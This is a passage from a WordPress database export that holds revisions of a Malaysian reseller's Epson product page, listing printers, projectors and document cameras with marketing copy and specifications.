solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:15:35','2019-09-25 09:15:35','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3464,1,'2019-09-25 17:16:05','2019-09-25 09:16:05','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" 